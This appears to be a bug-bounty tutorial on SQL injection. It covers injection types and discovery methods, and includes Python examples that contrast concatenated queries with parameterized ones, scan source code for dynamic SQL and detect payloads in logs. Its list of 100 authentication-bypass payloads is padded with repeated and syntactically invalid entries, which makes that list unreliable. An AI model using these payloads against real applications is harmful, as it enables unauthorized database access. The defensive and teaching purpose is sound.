SQL Injection | Bug Bounty

What is SQL Injection

SQL Injection is an attack that manipulates or extracts data from a database by exploiting flaws in how an application builds its SQL statements. It is a form of code injection that targets data-driven applications and can be used to gain access to a database and to read, modify, or delete its data. SQL Injection can also be used to bypass authentication, access restricted data, and in some cases even execute malicious code.

The most common way to perform an SQL Injection attack is to send malicious input to an application or website, which the application then uses to construct a SQL query. The resulting query can retrieve, modify, or delete data. Attackers can also use SQL Injection to gain access to the underlying operating system or to upload malware.

SQL Injection is prevented by using prepared statements, parameterized queries, and stored procedures. Input validation should also be performed so that malicious data is rejected before it reaches the database, and developers should ensure that any user-provided input that does reach a query is sanitized and properly escaped.
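The difference between building a query from strings and parameterizing it is easiest to see in running code. The following is an added example written for this page, not code from the original article. It uses Python's standard sqlite3 module with an in-memory database and constructed sample users, and assumes a login check of the kind the first payload in the list below targets. The identifier allowlist at the end covers the one case that parameters cannot handle: a column name supplied by the user.

```python
import sqlite3

# Constructed sample users for this demo (not data from the original page).
# Passwords are stored in clear text only to keep the demo short; a real
# system stores password hashes.
SAMPLE_USERS = [
    ("alice", "s3cret-alice", "user"),
    ("bob", "s3cret-bob", "admin"),
]

# Columns a caller may sort by. Identifiers cannot be bound as parameters,
# so they are checked against this fixed allowlist instead.
ALLOWED_SORT_COLUMNS = {"username", "role"}


def make_db():
    """Create an in-memory SQLite database holding the sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """The anti-pattern: input is spliced into the statement text, so a quote
    in the input closes the literal and the rest is parsed as SQL."""
    sql = (
        "SELECT username, role FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchall()


def login_safe(conn, username, password):
    """Parameterized query: the statement text is fixed and the driver passes
    the values separately, so they are only ever compared as data."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def list_users_sorted(conn, sort_column):
    """Sort by a caller-chosen column. The column name is an identifier, not a
    value, so it is validated against the allowlist before being spliced in."""
    if sort_column not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {sort_column!r}")
    return conn.execute(f"SELECT username FROM users ORDER BY {sort_column}").fetchall()


if __name__ == "__main__":
    conn = make_db()
    # The first payload from the list below, submitted as the username field.
    payload = "' OR 1=1--"
    print("concatenated query:", login_vulnerable(conn, payload, "x"))  # both rows
    print("parameterized query:", login_safe(conn, payload, "x"))  # []
    print("sorted by role:", list_users_sorted(conn, "role"))
```

With the concatenated version the submitted quote closes the username literal, `OR 1=1` makes the condition true for every row, and `--` comments out the password check; the parameterized version compares the whole string as a username and returns nothing.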

Types of SQL Injection

1. Error-Based SQL Injection: Error-Based SQL Injection extracts data from a vulnerable database through the database's own error messages. The attacker sends malicious input that the application uses to construct a SQL query; the query fails, and the error message returned to the user reveals information that depends on the data in the database.

2. Union-Based SQL Injection: Union-Based SQL Injection extracts data from a vulnerable database by combining result sets. The attacker sends malicious input that the application uses to construct a query containing a UNION, so the result is the union of two or more tables and the extra rows appear in the application's normal response, depending on the data in the database.

3. Blind SQL Injection: Blind SQL Injection extracts data from a vulnerable database when the application returns neither query results nor error messages directly. The attacker sends malicious input that makes the constructed query evaluate to either true or false, depending on the data in the database, and reads the answer from the difference in the application's response.

4. Inferential SQL Injection: Inferential SQL Injection also extracts data from a vulnerable database without seeing query output directly. Here the malicious input makes the constructed query delay its response for a certain amount of time, depending on the data in the database, and the attacker infers the data from how long the response takes.

5. Out-of-Band SQL Injection: Out-of-Band SQL Injection extracts data from a vulnerable database over a channel other than the application's response. The malicious input makes the constructed query send a response over an out-of-band channel, such as HTTP or DNS, whose content depends on the data in the database.

How to Find SQL Injection Vulnerabilities?

1. Manual Testing: Manual testing is one of the most effective ways to find SQL injection vulnerabilities. This involves manually analyzing the code of the application and looking for places where user input is being used to construct SQL queries. If there is no input validation or sanitization in place, then there is a risk of SQL Injection.

2. Automated Testing: Automated testing is another great way to identify SQL injection vulnerabilities. Automated testing tools can be used to scan an application or website for vulnerabilities and alert the user if any potential risks are identified.

3. Source Code Review: Source code reviews are an effective way to identify potential SQL injection vulnerabilities. This involves manually analyzing the source code of an application or website and looking for places where user input is being used to construct SQL queries. These places should then be thoroughly reviewed to ensure that proper input validation and sanitization are being performed.
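A reviewer looking for the places described in steps 1 and 3 usually starts with a search for SQL keywords inside string literals that are then concatenated or formatted with a variable. The following added example, not code from the original article, implements that first-pass heuristic in Python over a few constructed lines of Python and PHP source. It is a triage aid that reports candidate lines for human review; it will miss queries assembled across several statements, so it narrows the review rather than replacing it.

```python
import re

# Constructed source lines standing in for an application under review
# (not code from the original page). Lines 1-3 and 5 build SQL dynamically,
# 4 and 6 use placeholders, and 7 concatenates but is not SQL at all.
SAMPLE_SOURCE = [
    'cursor.execute("SELECT * FROM users WHERE id = " + request.args["id"])',
    'cursor.execute(f"SELECT * FROM orders WHERE owner = \'{user}\'")',
    'cursor.execute("SELECT * FROM users WHERE id = %s" % user_id)',
    'cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))',
    '$db->query("DELETE FROM sessions WHERE token = \'" . $_GET["token"] . "\'");',
    '$stmt = $db->prepare("SELECT name FROM users WHERE id = :id");',
    'logger.info("user " + name + " logged in")',
]

# A string literal that opens with a SQL keyword.
SQL_LITERAL = re.compile(r"""["']\s*(?:SELECT|INSERT|UPDATE|DELETE|FROM|WHERE)\b""", re.I)

# Idioms that splice a runtime value into the statement text.
DYNAMIC_BUILD = [
    (re.compile(r"""["']\s*\+\s*\w"""), "string concatenation (+)"),
    (re.compile(r"""["']\s*\.\s*\$"""), "string concatenation (PHP .)"),
    (re.compile(r"""\bf["'].*\{"""), "f-string interpolation"),
    (re.compile(r"""["']\s*%\s*\(?\s*\w"""), "%-formatting"),
    (re.compile(r"\.format\("), "str.format()"),
]


def scan_line(line):
    """Return the reasons a single line looks like dynamic SQL construction.
    The list is empty when the line holds no SQL literal or when the literal
    is combined only with placeholders."""
    if not SQL_LITERAL.search(line):
        return []
    return [label for pattern, label in DYNAMIC_BUILD if pattern.search(line)]


def scan_source(lines):
    """Return (line_number, stripped_line, reasons) for every flagged line.
    Queries built up over several statements are not detected by this
    single-line heuristic; those need a data-flow aware tool or a reader."""
    findings = []
    for number, line in enumerate(lines, 1):
        reasons = scan_line(line)
        if reasons:
            findings.append((number, line.strip(), reasons))
    return findings


if __name__ == "__main__":
    for number, line, reasons in scan_source(SAMPLE_SOURCE):
        print(f"line {number}: {', '.join(reasons)}")
        print(f"    {line}")
```

Lines 4 and 6 are not reported because placeholders (`?` and `:id`) keep the statement text fixed, which is exactly the property a reviewer is confirming; line 7 is not reported because the concatenated string is a log message, not a query.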

Where to find SQL Injection Vulnerabilities?

SQL injection vulnerabilities can be found in any application or website that uses a SQL database to store data. This includes web applications, mobile applications, and desktop applications. When analyzing an application for SQL injection vulnerabilities, it is important to look for places where user input is being used to construct SQL queries. If there is no input validation or sanitization in place, then there is a risk of SQL Injection.

100 SQL Injection Payloads

1. ' OR 1=1--
2. ' OR 'a'='a
3. " OR "a"="a
4. ' OR 1=1 LIMIT 1--
5. ' OR 'a'='a' LIMIT 1--
6. " OR "a"="a" LIMIT 1--
7. ' OR 1=1-- -
8. ' OR 1=1#
9. ' OR 1=1/*
10. ' OR 'a'='a'--
11. " OR "a"="a"--
12. ' OR 1=1 ORDER BY 1--
13. ' OR 'a'='a' ORDER BY 1--
14. " OR "a"="a" ORDER BY 1--
15. ' OR 1=1 GROUP BY 1--
16. ' OR 'a'='a' GROUP BY 1--
17. " OR "a"="a" GROUP BY 1--
18. ' OR 1=1 UNION SELECT 1--
19. ' OR 'a'='a' UNION SELECT 1--
20. " OR "a"="a" UNION SELECT 1--
21. ' OR 1=1 HAVING 1=1--
22. ' OR 'a'='a' HAVING 1=1--
23. " OR "a"="a" HAVING 1=1--
24. ' OR 1=1 ORDER BY 1 SELECT 1--
25. ' OR 'a'='a' ORDER BY 1 SELECT 1--
26. " OR "a"="a" ORDER BY 1 SELECT 1--
27. ' OR 1=1 GROUP BY 1 SELECT 1--
28. ' OR 'a'='a' GROUP BY 1 SELECT 1--
29. " OR "a"="a" GROUP BY 1 SELECT 1--
30. ' OR 1=1 UNION ALL SELECT 1--
31. ' OR 'a'='a' UNION ALL SELECT 1--
32. " OR "a"="a" UNION ALL SELECT 1--
33. ' OR 1=1 HAVING 1=1 SELECT 1--
34. ' OR 'a'='a' HAVING 1=1 SELECT 1--
35. " OR "a"="a" HAVING 1=1 SELECT 1--
36. ' OR 1=1 ORDER BY 1 SELECT 1 FROM DUAL--
37. ' OR 'a'='a' ORDER BY 1 SELECT 1 FROM DUAL--
38. " OR "a"="a" ORDER BY 1 SELECT 1 FROM DUAL--
39. ' OR 1=1 GROUP BY 1 SELECT 1 FROM DUAL--
40. ' OR 'a'='a' GROUP BY 1 SELECT 1 FROM DUAL--
41. " OR "a"="a" GROUP BY 1 SELECT 1 FROM DUAL--
42. ' OR 1=1 UNION ALL SELECT 1 FROM DUAL--
43. ' OR 'a'='a' UNION ALL SELECT 1 FROM DUAL--
44. " OR "a"="a" UNION ALL SELECT 1 FROM DUAL--
45. ' OR 1=1 HAVING 1=1 SELECT 1 FROM DUAL--
46. ' OR 'a'='a' HAVING 1=1 SELECT 1 FROM DUAL--
47. " OR "a"="a" HAVING 1=1 SELECT 1 FROM DUAL--
48. ' OR 1=1 ORDER BY 1 SELECT 1 FROM DUAL--
49. ' OR 'a'='a' ORDER BY 1 SELECT 1 FROM DUAL--
50. " OR "a"="a" ORDER BY 1 SELECT 1 FROM DUAL--
51. ' OR 1=1 GROUP BY 1 SELECT 1 FROM DUAL--
52. ' OR 'a'='a' GROUP BY 1 SELECT 1 FROM DUAL--
53. " OR "a"="a" GROUP BY 1 SELECT 1 FROM DUAL--
54. ' OR 1=1 UNION ALL SELECT 1 FROM DUAL--
55. ' OR 'a'='a' UNION ALL SELECT 1 FROM DUAL--
56. " OR "a"="a" UNION ALL SELECT 1 FROM DUAL--
57. ' OR 1=1 HAVING 1=1 SELECT 1 FROM DUAL--
58. ' OR 'a'='a' HAVING 1=1 SELECT 1 FROM DUAL--
59. " OR "a"="a" HAVING 1=1 SELECT 1 FROM DUAL--
60. ' OR 1=1 ORDER BY 1 SELECT 1 FROM DUAL--
61. ' OR 'a'='a' ORDER BY 1 SELECT 1 FROM DUAL--
62. " OR "a"="a" ORDER BY 1 SELECT 1 FROM DUAL--
63. ' OR 1=1 GROUP BY 1 SELECT 1 FROM DUAL--
64. ' OR 'a'='a' GROUP BY 1 SELECT 1 FROM DUAL--
65. " OR "a"="a" GROUP BY 1 SELECT 1 FROM DUAL--
66. ' OR 1=1 UNION ALL SELECT 1 FROM DUAL--
67. ' OR 'a'='a' UNION ALL SELECT 1 FROM DUAL--
68. " OR "a"="a" UNION ALL SELECT 1 FROM DUAL--
69. ' OR 1=1 HAVING 1=1 SELECT 1 FROM DUAL--
70. ' OR 'a'='a' HAVING 1=1 SELECT 1 FROM DUAL--
71. " OR "a"="a" HAVING 1=1 SELECT 1 FROM DUAL--
72. ' OR 1=1 ORDER BY 1 SELECT 1 FROM DUAL--
73. ' OR 'a'='a' ORDER BY 1 SELECT 1 FROM DUAL--
74. " OR "a"="a" ORDER BY 1 SELECT 1 FROM DUAL--
75. ' OR 1=1 GROUP BY 1 SELECT 1 FROM DUAL--
76. ' OR 'a'='a' GROUP BY 1 SELECT 1 FROM DUAL--
77. " OR "a"="a" GROUP BY 1 SELECT 1 FROM DUAL--
78. ' OR 1=1 UNION ALL SELECT 1 FROM DUAL--
79. ' OR 'a'='a' UNION ALL SELECT 1 FROM DUAL--
80. " OR "a"="a" UNION ALL SELECT 1 FROM DUAL--
81. ' OR 1=1 HAVING 1=1 SELECT 1 FROM DUAL--
82. ' OR 'a'='a' HAVING 1=1 SELECT 1 FROM DUAL--
83. " OR "a"="a" HAVING 1=1 SELECT 1 FROM DUAL--
84. ' OR 1=1 ORDER BY 1 SELECT 1 FROM DUAL--
85. ' OR 'a'='a' ORDER BY 1 SELECT 1 FROM DUAL--
86. " OR "a"="a" ORDER BY 1 SELECT 1 FROM DUAL--
87. ' OR 1=1 GROUP BY 1 SELECT 1 FROM DUAL--
88. ' OR 'a'='a' GROUP BY 1 SELECT 1 FROM DUAL--
89. " OR "a"="a" GROUP BY 1 SELECT 1 FROM DUAL--
90. ' OR 1=1 UNION ALL SELECT 1 FROM DUAL--
91. ' OR 'a'='a' UNION ALL SELECT 1 FROM DUAL--
92. " OR "a"="a" UNION ALL SELECT 1 FROM DUAL--
93. ' OR 1=1 HAVING 1=1 SELECT 1 FROM DUAL--
94. ' OR 'a'='a' HAVING 1=1 SELECT 1 FROM DUAL--
95. " OR "a"="a" HAVING 1=1 SELECT 1 FROM DUAL--
96. ' OR 1=1 ORDER BY 1 SELECT 1 FROM DUAL--
97. ' OR 'a'='a' ORDER BY 1 SELECT 1 FROM DUAL--
98. " OR "a"="a" ORDER BY 1 SELECT 1 FROM DUAL--
99. ' OR 1=1 GROUP BY 1 SELECT 1 FROM DUAL--
100. ' OR 'a'='a' GROUP BY 1 SELECT 1 FROM DUAL--
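The list above is also useful from the defender's side: the payloads share a few structural features (a quote followed by OR, an always-true comparison, a UNION SELECT, a trailing comment) that can be recognised in request logs and mapped back to the types described earlier. The following is an added example, not code from the original page, that classifies constructed request-parameter values, some benign and some copied verbatim from the list, by those features. It is heuristic detection for alerting and log review, not a substitute for parameterized queries, and the `O'Brien` sample shows why a bare quote on its own must not be treated as an attack.

```python
import re
from collections import Counter

# Constructed request-parameter values: benign inputs mixed with payloads
# copied from the list above.
SAMPLE_PARAMS = [
    ("username", "alice"),
    ("username", "O'Brien"),
    ("search", "select a size"),
    ("username", "' OR 1=1--"),
    ("username", '" OR "a"="a'),
    ("id", "' OR 1=1 UNION SELECT 1--"),
    ("id", "' OR 1=1 HAVING 1=1 SELECT 1 FROM DUAL--"),
]

# Each signature corresponds to one structural feature of the payloads above.
SIGNATURES = [
    # OR 1=1, OR 'a'='a, OR "a"="a: an always-true comparison, the
    # authentication-bypass pattern (quote group may be empty).
    ("tautology", re.compile(r"""\bOR\s+(['"]?)(\w+)\1\s*=\s*\1\2\b""", re.I)),
    # --, # or /* at the end of the value, used to discard the rest of the
    # original statement ("-- -" is allowed as a trailing variant).
    ("comment-truncation", re.compile(r"(--|#|/\*)[\s-]*$")),
    # UNION [ALL] SELECT: the union-based extraction pattern.
    ("union-select", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    # A quote directly followed by a SQL keyword: the literal was closed and
    # a new clause injected. A name such as D'Or would also match this one,
    # which is why a single signature should raise an alert, not a block.
    ("clause-injection", re.compile(r"""['"]\s*(?:OR|AND|ORDER\s+BY|GROUP\s+BY|HAVING|UNION)\b""", re.I)),
]


def classify(value):
    """Return the names of all signatures that match one parameter value."""
    return [name for name, pattern in SIGNATURES if pattern.search(value)]


def review(params):
    """Return (parameter, value, signatures) for every value that matched at
    least one signature, plus a Counter of how often each signature fired."""
    findings = []
    counts = Counter()
    for name, value in params:
        hits = classify(value)
        if hits:
            findings.append((name, value, hits))
            counts.update(hits)
    return findings, counts


if __name__ == "__main__":
    findings, counts = review(SAMPLE_PARAMS)
    for name, value, hits in findings:
        print(f"{name}={value!r}: {', '.join(hits)}")
    print("signature counts:", dict(counts))
```

Benign values such as `alice`, `O'Brien` and `select a size` produce no match because none of them pairs a quote with a following keyword or contains an always-true comparison; every payload from the list matches at least two signatures, which is a useful threshold when tuning alerts.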
